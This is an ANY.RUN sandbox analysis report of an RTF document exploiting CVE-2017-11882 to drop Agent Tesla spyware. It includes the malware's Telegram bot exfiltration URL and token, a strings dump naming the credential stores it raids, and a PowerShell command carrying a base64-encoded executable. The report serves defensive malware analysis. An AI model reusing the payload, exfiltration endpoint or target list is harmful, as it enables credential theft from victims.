analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

8c65081cbc51c47f8ec97c98a8645ff0

Full analysis: https://app.any.run/tasks/2c66ae3e-c4d1-420c-988f-6a398ab2b125
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Analysis date: April 01, 2023, 04:46:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
exploit
cve-2017-11882
agenttesla
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1
MD5:

8C65081CBC51C47F8EC97C98A8645FF0

SHA1:

85D168E0B6F45B6A5F3E42E7319C78968E199EDE

SHA256:

D6DAA3DEEC1794602CD5D15D77C4CFBA68B90C65C264B9C8754C7ABA5AD81D34

SSDEEP:

24576:xpPfQe4ZmpbGs32XdO3GL7+G2XAffPO21KNLhnoGPN8Qrzzk50AWHLUxo2G2KioE:0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2428)
    • Suspicious connection from the Equation Editor

      • EQNEDT32.EXE (PID: 2428)
    • AGENTTESLA detected by memory dumps

      • RegSvcs.exe (PID: 2068)
    • Steals credentials from Web Browsers

      • RegSvcs.exe (PID: 2068)
    • Actions looks like stealing of personal data

      • RegSvcs.exe (PID: 2068)
  • SUSPICIOUS

    • Reads the Internet Settings

      • EQNEDT32.EXE (PID: 2428)
      • powershell.exe (PID: 2464)
      • wscript.exe (PID: 2064)
      • RegSvcs.exe (PID: 2068)
    • Reads settings of System Certificates

      • EQNEDT32.EXE (PID: 2428)
      • RegSvcs.exe (PID: 2068)
    • Reads security settings of Internet Explorer

      • EQNEDT32.EXE (PID: 2428)
      • powershell.exe (PID: 2464)
    • Checks Windows Trust Settings

      • EQNEDT32.EXE (PID: 2428)
    • Base64-obfuscated command line is found

      • wscript.exe (PID: 2064)
    • The process executes VB scripts

      • EQNEDT32.EXE (PID: 2428)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 2064)
    • Unusual connection from system programs

      • powershell.exe (PID: 2464)
    • Connects to the server without a host name

      • powershell.exe (PID: 2464)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • RegSvcs.exe (PID: 2068)
    • Accesses Microsoft Outlook profiles

      • RegSvcs.exe (PID: 2068)
  • INFO

    • Reads the computer name

      • EQNEDT32.EXE (PID: 2428)
      • RegSvcs.exe (PID: 2068)
    • Reads the machine GUID from the registry

      • EQNEDT32.EXE (PID: 2428)
      • RegSvcs.exe (PID: 2068)
    • Checks supported languages

      • EQNEDT32.EXE (PID: 2428)
      • RegSvcs.exe (PID: 2068)
    • Checks proxy server information

      • EQNEDT32.EXE (PID: 2428)
    • The process checks LSA protection

      • EQNEDT32.EXE (PID: 2428)
      • powershell.exe (PID: 2464)
      • RegSvcs.exe (PID: 2068)
    • Creates files or folders in the user directory

      • EQNEDT32.EXE (PID: 2428)
    • Create files in a temporary directory

      • powershell.exe (PID: 2464)
    • Reads Environment values

      • RegSvcs.exe (PID: 2068)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AgentTesla

(PID) Process(2068) RegSvcs.exe
Protocoltelegram
Urlhttps://api.telegram.org/bot1977970812:AAHd8pA2REAwdAB_6eJ-9nZj90oz8OYGjrI/sendDocument
ChatId1972606022
Strings (790)
60
yyyy-MM-dd HH:mm:ss
yyyy_MM_dd_HH_mm_ss
<br>
<hr>
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
AES
Microsoft Primitive Provider
CONNECTION
KEEP-ALIVE
PROXY-AUTHENTICATE
PROXY-AUTHORIZATION
TE
TRAILER
TRANSFER-ENCODING
UPGRADE
%startupfolder%
\%insfolder%\%insname%
/
\%insfolder%\
Software\Microsoft\Windows\CurrentVersion\Run
%insregname%
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
True
%
GET
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
OK
http://EWEAQv.com
\msI
SELECT * FROM Win32_Processor
Name
MB
Unknown
CO
CO_
-
_
.zip
yyyy-MM-dd hh-mm-ss
Cookie
application/zip
SC
SC_
.jpeg
Screenshot
image/jpeg
/log.tmp
KL
KL_
.html
<html>
</html>
Log
text/html
[
]
Time:
MM/dd/yyyy HH:mm:ss
User Name:
Computer Name:
OSFullName:
CPU:
RAM:
IP Address:
New
Recovered!
User Name
:
OSFullName
uninstall
Software\Microsoft\Windows NT\CurrentVersion\Windows
Load
%ftphost%/
%ftpuser%
%ftppassword%
STOR
Length
Write
Close
GetBytes
Opera Browser
Opera Software\Opera Stable
Yandex Browser
Yandex\YandexBrowser\User Data
Iridium Browser
Iridium\User Data
Chromium
Chromium\User Data
7Star
7Star\7Star\User Data
Torch Browser
Torch\User Data
Cool Novo
MapleStudio\ChromePlus\User Data
Kometa
Kometa\User Data
Amigo
Amigo\User Data
Brave
BraveSoftware\Brave-Browser\User Data
CentBrowser
CentBrowser\User Data
Chedot
Chedot\User Data
Orbitum
Orbitum\User Data
Sputnik
Sputnik\Sputnik\User Data
Comodo Dragon
Comodo\Dragon\User Data
Vivaldi
Vivaldi\User Data
Citrio
CatalinaGroup\Citrio\User Data
360 Browser
360Chrome\Chrome\User Data
Uran
uCozMedia\Uran\User Data
Liebao Browser
liebao\User Data
Elements Browser
Elements Browser\User Data
Epic Privacy
Epic Privacy Browser\User Data
Coccoc
CocCoc\Browser\User Data
Sleipnir 6
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
QIP Surf
QIP Surf\User Data
Coowon
Coowon\Coowon\User Data
APPDATA
\CoreFTP\sites.idx
HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\
Host
HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSites
Port
User
PW
CoreFTP
webpanel
,
"
smtp
ftp
URL:
Username:
Password:
Application:
URL:
Username:
Password:
Application:
PW_
%mailaddres%
%password%
%smtp%
%toemail%
image/jpg
:Zone.Identifier
\tmpG
.tmp
%urlkey%
-f
\Data\Tor\torrc
p=
%PostURL%
127.0.0.1
POST
+
%2B
application/x-www-form-urlencoded
&
&amp;
<
&lt;
>
&gt;
&quot;
Copied Text:
<font color="#00b1ba"><b>[
</b>
<b>]</b> <font color="#000000">(
)</font></font>
False
<font color="#00ba66">{BACK}</font>
</font>
<font color="#00ba66">{ALT+TAB}</font>
<font color="#00ba66">{ALT+F4}</font>
<font color="#00ba66">{TAB}</font>
<font color="#00ba66">{ESC}</font>
<font color="#00ba66">{Win}</font>
<font color="#00ba66">{CAPSLOCK}</font>
<font color="#00ba66">&uarr;</font>
<font color="#00ba66">&darr;</font>
<font color="#00ba66">&larr;</font>
<font color="#00ba66">&rarr;</font>
<font color="#00ba66">{DEL}</font>
<font color="#00ba66">{END}</font>
<font color="#00ba66">{HOME}</font>
<font color="#00ba66">{Insert}</font>
<font color="#00ba66">{NumLock}</font>
<font color="#00ba66">{PageDown}</font>
<font color="#00ba66">{PageUp}</font>
<font color="#00ba66">{ENTER}</font>
<font color="#00ba66">{F1}</font>
<font color="#00ba66">{F2}</font>
<font color="#00ba66">{F3}</font>
<font color="#00ba66">{F4}</font>
<font color="#00ba66">{F5}</font>
<font color="#00ba66">{F6}</font>
<font color="#00ba66">{F7}</font>
<font color="#00ba66">{F8}</font>
<font color="#00ba66">{F9}</font>
<font color="#00ba66">{F10}</font>
<font color="#00ba66">{F11}</font>
<font color="#00ba66">{F12}</font>
control
<font color="#00ba66">{CTRL}</font>
Windows RDP
credential
policy
blob
rdg
chrome
{{{0}}}
CopyTo
ComputeHash
sha512
Copy
SystemDrive
\
WScript.Shell
RegRead
g
401
502
500
Add
chat_id
1972606022
caption
https://api.telegram.org/bot1977970812:AAHd8pA2REAwdAB_6eJ-9nZj90oz8OYGjrI/sendDocument
document
---------------------------
x
--
multipart/form-data; boundary=
Content-Disposition: form-data; name="{0}" {1}
Content-Disposition: form-data; name="{0}"; filename="{1}" Content-Type: {2}
--
Cookies
Opera
Chrome
\Google\Chrome\User Data
\360Chrome\Chrome\User Data
Yandex
SRWare Iron
Brave Browser
\Iridium\User Data
CoolNovo
Epic Privacy Browser
CocCoc
QQ Browser
Tencent\QQBrowser\User Data
UC Browser
UCBrowser\
uCozMedia
cookies.sqlite
Firefox
\Mozilla\Firefox\
IceCat
\Mozilla\icecat\
PaleMoon
\Moonchild Productions\Pale Moon\
SeaMonkey
\Mozilla\SeaMonkey\
Flock
\Flock\Browser\
K-Meleon
\K-Meleon\
Postbox
\Postbox\
Thunderbird
\Thunderbird\
IceDragon
\Comodo\IceDragon\
WaterFox
\Waterfox\
BlackHawk
\NETGATE Technologies\BlackHawk\
CyberFox
\8pecxstudios\Cyberfox\
Path=([A-z0-9\/\.\-]+)
profiles.ini
\Default\
Profile
origin_url
username_value
password_value
v10
v11
Opera Stable
\Local State
"encrypted_key":"(.*?)"
\Default\Login Data
\Login Data
\Google\Chrome\User Data\
logins
Major
Minor
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
SchemaId
pResourceElement
pIdentityElement
pPackageSid
pAuthenticatorElement
IE/Edge
Type
Value
\Common Files\Apple\Apple Application Support\plutil.exe
\Apple Computer\Preferences\keychain.plist
*
Login Data
journal
wow_logins
\Microsoft\Edge\User Data
Edge Chromium
\Microsoft\Credentials\
\Microsoft\Protect\
GuidMasterKey
\Default\EncryptedStorage
\EncryptedStorage
entries
category
Password
str3
str2
blob0
PopPassword
SmtpPassword
Software\IncrediMail\Identities\
\Accounts_New
EmailAddress
SmtpServer
incredimail
HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine
current
Settings
SavePasswordText
ReturnAddress
Eudora
\falkon\profiles\
startProfile="([A-z0-9\/\.]+)"
\browsedata.db
autofill
Falkon Browser
startProfile=([A-z0-9\/\.]+)
Backend=([A-z0-9\/\.-]+)
\settings.ini
\Claws-mail
\clawsrc
passkey0
master_passphrase_salt=(.+)
master_passphrase_pbkdf2_rounds=(.+)
use_master_passphrase=(.+)
\accountrc
smtp_server
address
account
\passwordstorerc
{(.*),(.*)}(.*)
ClawsMail
TransformFinalBlock
Substring
IterationCount
signons3.txt
---
.
objects
Data
DecryptTripleDes
Flock Browser
ALLUSERSPROFILE
\\
DynDNS\Updater\config.dyndns
username=
=
password=
&H
t6KzXhCh
http://DynDns.com
DynDNS
\Psi\profiles
\Psi+\profiles
\accounts.xml
name
jid
password
Psi/Psi+
Software\OpenVPN-GUI\configs
Software\OpenVPN-GUI\configs\
username
auth-data
entropy
Open VPN
USERPROFILE
\OpenVPN\config\
remote
\FileZilla\recentservers.xml
<Server>
<Host>
</Host>
:
<Port>
</Port>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Pass>
FileZilla
SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
HostName
UserName
PublicKeyFile
PortNumber
22
[PRIVATE KEY LOCATION: "{0}"]
WinSCP
Username
All Users
\FlashFXP\3quick.dat
IP=
port=
user=
pass=
created=
FlashFXP
\FTP Navigator\Ftplist.txt
Server
No Password
FTP Navigator
Programfiles(x86)
programfiles
\jDownloader\config\database.script
programfiles(x86)
INSERT INTO CONFIG VALUES('AccountController','
sq
.
t
xt
JDownloader
Software\Paltalk
HKEY_CURRENT_USER\Software\Paltalk\
pwd
Paltalk
\.purple\accounts.xml
<account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Pidgin
\SmartFTP\Client 2.0\Favorites\Quick Connect\
\SmartFTP\Client 2.0\Favorites\Quick Connect\*.xml
<Password>
</Password>
<Name>
</Name>
SmartFTP
appdata
\Ipswitch\WS_FTP\Sites\ws_ftp.ini
HOST
UID
PWD
WS_FTP
PWD=
Key
Mode
IV
Padding
CreateDecryptor
\cftp\Ftplist.txt
;Server=
;Port=
;Password=
;User=
;Anonymous=
Name=
FTPCommander
\FTPGetter\servers.xml
<server>
<server_ip>
</server_ip>
<server_port>
</server_port>
<server_user_name>
</server_user_name>
<server_user_password>
</server_user_password>
FTPGetter
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC
HKEY_CURRENT_USER\SOFTWARE\Vitalwerks\DUC
USERname
NO-IP
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
\The Bat!
\Account.CFN
zzz
TheBat
HKEY_CURRENT_USER\Software\RimArts\B2\Settings
DataDir
Folder.lst
\Mailbox.ini
Account
SMTPServer
MailAddress
PassWd
Becky!
\Trillian\users\global\accounts.dat
Accounts
Trillian
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Email
IMAP Password
POP3 Password
HTTP Password
SMTP Password
SMTP Server
Outlook
HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Executable
HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
FoxmailPath
\Storage\
\mail\
\VirtualStore\Program Files\Foxmail\mail\
\VirtualStore\Program Files (x86)\Foxmail\mail\
\Accounts\Account.rec0
\Account.stg
Read
Dispose
POP3Host
SMTPHost
IncomingServer
POP3Password
Foxmail
5A
71
\Opera Mail\Opera Mail\wand.dat
opera:
Opera Mail
abcçdefgğhıijklmnoöpqrsştuüvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
\Pocomail\accounts.ini
POPPass
SMTPPass
SMTP
PocoMail
RealVNC 4.x
SOFTWARE\Wow6432Node\RealVNC\WinVNC4
RealVNC 3.x
SOFTWARE\RealVNC\vncserver
SOFTWARE\RealVNC\WinVNC4
Software\ORL\WinVNC3
TightVNC
Software\TightVNC\Server
PasswordViewOnly
TightVNC ControlPassword
ControlPassword
TigerVNC
Software\TigerVNC\Server
Trim
UltraVNC
ProgramFiles(x86)
\uvnc bvba\UltraVNC\ultravnc.ini
passwd
passwd2
ProgramFiles
\UltraVNC\ultravnc.ini
\eM Client
.dll
eM Client\accounts.dat
eM Client
AccountConfiguration
72905C47-F4FD-4CF7-A489-4E8121A155BD
host
o6806642kbM7c5
\Mailbird\Store\Store.db
Server_Host
EncryptedPassword
Mailbird
SenderIdentities
NordVPN
NordVPN directory not found!
NordVpn.exe*
user.config
SelectSingleNode
//setting[@name='Username']/value
InnerText
//setting[@name='Password']/value
\MySQL\Workbench\workbench_user_data.dat


MySQL Workbench
%ProgramW6432%
Private Internet Access\data
\Private Internet Access\data
\account.json
.*"username":"(.*?)"
.*"password":"(.*?)"
Private Internet Access
<array>
<dict>
<string>
</string>
<data>
</data>
Safari Browser
-convert xml1 -s -o "
\fixed_keychain.xml"
A
10
B
11
C
12
D
13
E
14
F
15
ABCDEF
(
EndsWith
)
IndexOf
UNIQUE
table
Software\DownloadManager\Passwords\
EncPassword
Internet Download Manager
{0}
http://127.0.0.1:
HTTP/1.1
Hostname
200 Connection established Proxy-Agent: HToS5x
Connect
PathAndQuery
Fragment
Host:
Wr
W
ExtractFile
n
Tor
AUTHENTICATE "%torpass%"
SIGNAL NEWNYM
250
tor
StartInfo
FileName
\Tor\tor.exe
Arguments
UseShellExecute
RedirectStandardOutput
CreateNoWindow
Start
StandardOutput
ReadLine
Contains
Bootstrapped 100%
EndOfStream
Id
AvoidDiskWrites 1 Log notice stdout DormantCanceledByStartup 1 ControlPort 9051 CookieAuthentication 1 runasdaemon 1 ExtORPort auto hashedcontrolpassword %hash% DataDirectory %tordir%\Data\Tor GeoIPFile %tordir%\Data\Tor\geoip GeoIPv6File %tordir%\Data\Tor\geoip6
\tor.zip
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
%tordir%
%hash%
%torpass%
https://www.theonionrouter.com/dist.torproject.org/torbrowser/
<a.+?href\s*=\s*(["'])(?<href>.+?)\1[^>]*>
href
Replace
TrimStart
TrimEnd
tor-win32-
TransformBlock
Hash
16:
None
win32_processor
processorID
8f5410fc-22f7-4e67-b040-5d5d43d7d53a
Win32_NetworkAdapterConfiguration
IPEnabled
MacAddress
0d77f039-a07c-4875-857c-58b09177d41a
WinMgmts:
InstancesOf
Win32_BaseBoard
SerialNumber
8de92a18-36e4-45bc-b59b-fc323e880efa
x2
00061561
Berkelet DB
00000002
1.85 (Hash, version 2, native byte-order)
Unknow database format
SEQUENCE {
{0:X2}
INTEGER
OCTETSTRING
OBJECTIDENTIFIER
}
sha256
key4.db
metaData
id
item1
item2
nssPrivate
a11
a102
2a864886f70d0209
2a864886f70d010c050103
key3.db
global-salt
Version
password-check
logins.json
\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"
[^\u0020-\u007F]
signons.sqlite
moz_logins
hostname
encryptedUsername
encryptedPassword
Version=4.0.0.0
version=2.0.0.0
mscorlib
System
MailClient.Protocols.Smtp.SmtpAccountConfiguration
MailClient.Accounts.TlsType
MailClient.Accounts.CredentialsModelTypes
MailClient.Accounts.Mail.MailAccountConfiguration
MailClient.Accounts.ArchivingScope
MailClient.Mail.MailAddress
;
info
AccountConfiguration+accountName
AccountConfiguration+username
AccountConfiguration+password
providerName
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
5
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe wscript.exe no specs powershell.exe #AGENTTESLA regsvcs.exe

Process information

PID
CMD
Path
Indicators
Parent process
1764"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\8c65081cbc51c47f8ec97c98a8645ff0.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.5123.5000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\lpk.dll
2428"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
Modules
Images
c:\program files\common files\microsoft shared\equation\eqnedt32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
2064"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\zgsayyasu.vbs" C:\Windows\SysWOW64\wscript.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\syswow64\wscript.exe
c:\windows\system32\wow64.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\advapi32.dll
2464"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABcBCWQAAAAAAAAAAOAAAiELAVAAADAAAAAGAAAAAAAAjk8AAAAgAAAAYAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADxPAABPAAAAAGAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAlC8AAAAgAAAAMAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAYAAAAAQAAAAyAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAAAAACAAAANgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABwTwAAAAAAAEgAAAACAAUAJCwAABAhAAADAAAAAAAAADRNAAAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooKwAABioeAigBAAAKKh4CKAMAAAoqABMwCABJAAAAAAAAAHMEAAAKgAEAAAQWKwEWRQMAAAACAAAADwAAABwAAAArJ3MFAAAKgAIAAAQXK+BzBgAACoADAAAEGCvTcwcAAAqABAAABBkrxioufgEAAARvCAAACioufgIAAARvCQAACioufgMAAARvCgAACioufgQAAARvCwAACir2FysBFiwAfgUAAAQUKBoAAAosJHIBAABwHSgsAAAG0AUAAAIoDwAACm8bAAAKcxwAAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDQAABigdAAAKdAYAAAKABwAABCoeAigeAAAKKhp+BwAABCoaKA4AAAYqHgIoEgAACioAABMwBQBGAAAAAQAAEXIhAABwHCgsAAAGCxYrARZFAgAAAAIAAAAYAAAAKx8XDAd+IAAACgIXKBwAAAYsBxcKFyvbKw0IF9YMGCvSCBsx3xYKBioAABswCwARBAAAAgAAEXKVAABwGSgsAAAGAighAAAKDBYrARZFAwAAAAIAAAANAAAAGAAAACshEgP+FQ8AAAIXK+ISBP4VDgAAAhgr1xIDFn0YAAAEGSvMEgPQDwAAAigPAAAKKCIAAAq4fQ0AAAQDKCMAAAotEwhyoQAAcBgoLAAABgMoJAAACgwCCH4lAAAKfiUAAAoWGn4lAAAKFBIDEgQoEQAABi0GcyYAAAp6BB88KCcAAAoTBRYrARZFFAAAAAUAAAAVAAAAJAAAADMAAAB0AAAAwAAAANMAAADyAAAAAgEAAFABAABlAQAAbwEAAIgBAACcAQAAsAEAAMgBAADeAQAADQIAACwCAABdAgAAOHECAAAEEQUfNNYoJwAAChMGFyuWILMAAACNCQAAARMHGCuHEQcWIAIAAQCeGTh4////KCgAAAoaMxYRBHsKAAAEEQcoEgAABi0ccyYAAAp6EQR7CgAABBEHKBMAAAYtBnMmAAAKehEHHymUEwgaODf///8RBHsJAAAEEQge1hIJGhIBKBYAAAYtBnMmAAAKehEGEQkzFhEEewkAAAQRCSgYAAAGLAZzJgAACnoEEQUfUNYoJwAAChMKGzjr/v//BBEFH1TWKCcAAAoTCxw42P7//xEEewkAAAQRBhEKIAAwAAAfQCgZAAAGEw0dOLn+//8FLSURDS0hFxMMHjip/v//EQR7CQAABBYRCiAAMAAAH0AoGQAABhMNEQ0tBnMmAAAKehEEewkAAAQRDQQRCxIBKBcAAAYtBnMmAAAKehEFIPgAAADWEw4fCThb/v//BBEFHNYoKQAAChfaExEfCjhG/v//FhMSHws4PP7//zifAAAABBEOHwzWKCcAAAoTEx8MOCP+//8EEQ4fENYoJwAAChMUHw04D/7//wQRDh8U1ignAAAKExUfDjj7/f//ERQsSxEUF9oX1o0bAAABExYfDzjj/f//BBEVERYWERaOaSgqAAAKHxA4zf3//xEEewkAAAQRDRET1hEWERaOaRIBKBcAAAYtBnMmAAAKehEOHyjWEw4fETie/f//ERIX1hMSERIRET5Y////EQ0oKwAAChMPHxI4f/3//xEEewkAAAQRCB7WEQ8aEgEoFwAABi0GcyYAAAp6BBEFHyjWKCcAAAoTEB8TOE79//8RDCwEEQYTDREHHywRDREQ1p4fFDg1/f//KCgAAAoaMxYRBHsKAAAEEQcoFAAABi0ccyYAAAp6EQR7CgAABBEHKBUAAAYtBnMmAAAKehEEewoAAAQoGgAABhUzBnMmAAAKet5IKCwAAAoWKwEWRQMAAAACAAAAFAAAACQAAAArKhEEewsAAASEKC0AAAoTFxcr2xEXLAcRF28uAAAKFgoYK8soLwAAChkrw94CFwoGKgAAAEEcAAAAAAAAYQAAAGQDAADFAwAASAAAABgAAAEeAigSAAAKKhswBgB8AQAAAwAAEXMwAAAKJSgxAAAKbzIAAAoCKDMAAAooNAAACnKlAABwGygsAAAGcrEAAHAbKCwAAAZvNQAACnK1AABwFygsAAAGcsMAAHAYKCwAAAZvNQAACnLHAABwGSgsAAAGctMAAHAXKCwAAAZvNQAACnLXAABwHCgsAAAGcuMAAHAZKCwAAAZvNQAACnLnAABwGSgsAAAGcvkAAHAbKCwAAAZvNQAACnL9AABwGCgsAAAGcg8BAHAZKCwAAAZvNQAACnITAQBwGygsAAAGciUBAHAdKCwAAAZvNQAACnIpAQBwFigsAAAGcjUBAHAcKCwAAAZvNQAACnI5AQBwHSgsAAAGcksBAHAWKCwAAAZvNQAACnJPAQBwFigsAAAGcmEBAHAYKCwAAAZvNQAACnJlAQBwGCgsAAAGcncBAHAYKCwAAAZvNQAACm82AAAKCgZvNwAACig0AAAKKDgAAAooGwAABibeGSUoLAAACgsWKwEWLAIrCCgvAAAKFyv03gAqQRwAAAAAAAAAAAAAYgEAAGIBAAAZAAAAGAAAARMwCgAUAgAABAAAEXJ7AQBwHigsAAAGcpcBAHAoOQAACigMAAAKChYrARZFCgAAAAUAAAAjAAAAWAAAAJMAAADBAAAA7wAAAB0BAABGAQAAdAEAAKMBAAA4wgEAAHJ7AQBwHigsAAAGcpcBAHAoOQAACigMAAAKChcrsAYUcpkBAHAYKCwAAAYXjQUAAAElFnK3AQBwGigsAAAGohQUFCg6AAAKKAwAAAoMGDh7////BhRyxwEAcBsoLAAABheNBQAAASUWCHLlAQBwFigsAAAGKDsAAAqiFBQUKDoAAAooDAAACgsZOED///8HFHL/AQBwFygsAAAGF40FAAABJRZyGQIAcBsoLAAABqIUFCg8AAAKGjgS////BxRyNwIAcBgoLAAABheNBQAAASUWck0CAHAWKCwAAAaiFBQoPAAAChs45P7//wcUcsECAHAYKCwAAAYXjQUAAAElFnLjAgBwHSgsAAAGohQUKDwAAAocOLb+//8HFHJXAwBwFygsAAAGF40FAAABJRYdjAkAAAGiFBQoPAAACh04jf7//wcUcm8DAHAZKCwAAAYXjQUAAAElFnKDAwBwGigsAAAGohQUKDwAAAoeOF/+//8HFHKSBABwGCgsAAAGF40FAAABJRZyqgQAcB0oLAAABqIUFCg8AAAKHwk4MP7//wcUcr4EAHAbKCwAAAYWjQUAAAEUFBQXKD0AAAomHwo4DP7//yoeAigSAAAKKjYCAygMAAAKKA0AAAoqHgIoDgAACiou0AwAAAIoDwAACioeAigQAAAKKgAAEzABABoAAAAFAAARFysBFiwAAowFAAAbLQgoAQAAKworAgIKBioiA/4VBQAAGyoeAigSAAAKKgATMAIAMwAAAAYAABECexMAAApvFAAACgoWKwEWLAIrEQaMCAAAGy0VKAIAACsKFyvrAnsTAAAKBm8WAAAKBipiFysBFiwAAigSAAAKAnMYAAAKfRMAAAoqEzAFAOsAAAAHAAARfiAAAAQU/gE5jwAAACg+AAAKcsgEAHAZKCwAAAZvPwAACgsWKwEWRQIAAAAFAAAATQAAADiEAAAABxT+AS1dB3NAAAAKIcm3b80+/xkzKEEAAAohKC/qCrNCSGMoQQAACm9CAAAKFnNDAAAKFnNEAAAKc0UAAAoMCChGAAAKFyumCG9HAAAKKEgAAAolgB8AAARvSQAACoAgAAAEfiAAAAQU/gEtQyg+AAAKAyhKAAAK/gEsNBYKGDhq////Kx5+IAAABAaaA29LAAAKKEwAAAosBn4fAAAEKgYXWAoGfiAAAASOaf4ELdYUKl4oTQAAChT+BioAAAZzTgAACm9PAAAKKgATMAcAbQAAAAgAABEg5AVGHANYChYrARZFAwAAAAIAAAAMAAAAOwAAACtAAihQAAAKCxcr4xYMCAeOaf4ELC4HCAcI